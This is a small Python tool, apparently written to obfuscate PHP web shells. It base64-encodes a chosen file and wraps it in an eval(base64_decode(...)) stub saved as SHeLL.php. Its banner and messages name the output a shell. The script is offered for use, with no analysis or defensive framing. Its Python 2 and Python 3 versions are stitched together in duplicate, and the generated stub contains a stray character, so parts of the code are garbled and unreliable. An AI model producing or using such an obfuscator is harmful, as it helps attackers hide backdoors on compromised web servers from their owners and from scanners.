import base64
import os
import webbrowser
import time
demosfile=base64.b64decode("Kz09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PSs=")
infile=base64.b64decode('fC4uLi4uLi4uLi4uLi4uLi5FbmNvZGUgc2hlbGwuLi4uLi4uLi4uLnw=')
renamderso=base64.b64decode('Ky0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSs=')
heviegher=base64.b64decode('fC4uLi4uLi4uLi4uLi4gTW9oYW1lZCBTYWxhaCAuLi4uLi4uLi4uLnw=')
acersiong=base64.b64decode('Ky0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSs=')
pengo=base64.b64decode('aHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL21zcGlx')
myhert=base64.b64decode('aHR0cHM6Ly9naXRodWIuY29tL21oaXE=')
print (infile)
print (renamderso)
print (heviegher)
print (acersiong)
print (pengo)
print (myhert)
print ("=====================================================")
print ("")
print ("")
print ("")
print ("")
fileshell=raw_input("Enter the file to be encrypted(php,txt):")
demosfile = base64.b64decode("Kz09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PSs=")
infile = base64.b64decode('fC4uLi4uLi4uLi4uLi4uLi5FbmNvZGUgc2hlbGwuLi4uLi4uLi4uLnw=')
renamderso = base64.b64decode('Ky0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSs=')
heviegher = base64.b64decode('fC4uLi4uLi4uLi4uLi4gTW9oYW1lZCBTYWxhaCAuLi4uLi4uLi4uLnw=')
acersiong = base64.b64decode('Ky0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSs=')
pengo = base64.b64decode('aHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL21zcGlx')
myhert = base64.b64decode('aHR0cHM6Ly9naXRodWIuY29tL21oaXE=')
print(infile)
print(renamderso)
print(heviegher)
print(acersiong)
print(pengo)
print(myhert)
print("=====================================================")
print("")
print("")
print("")
print("")
fileshell=input("Enter the file to be encrypted(php,txt):")
readfiellshell = open(fileshell,'r')
print ("Please wait Gary read file")
print("Please wait Gary read file")
reagingfileshell = readfiellshell.read()
time.sleep(1)
print ("Please wait Gary achieve encryption")
print("Please wait Gary achieve encryption")
bymspiq=base64.b64encode(reagingfileshell)
time.sleep(1)
OpenNewFileAndWrite=open("SHeLL.php",'w')
OpenNewFileAndWrite.write("%s%s"%('''<?php eval("?>".base64_decode("''',bymspiq.strip()+'''+")); ?>'''))
time.sleep(3)
print ("Encryption has been successfully\n")
print ("You will find the script's next\n")
print ('''name The shell:\n=>ShElL.php<=''')
print("Encryption has been successfully\n")
print("You will find the script's next\n")
print('''name The shell:\n=>ShElL.php<=''')
webbrowser.open(myhert)
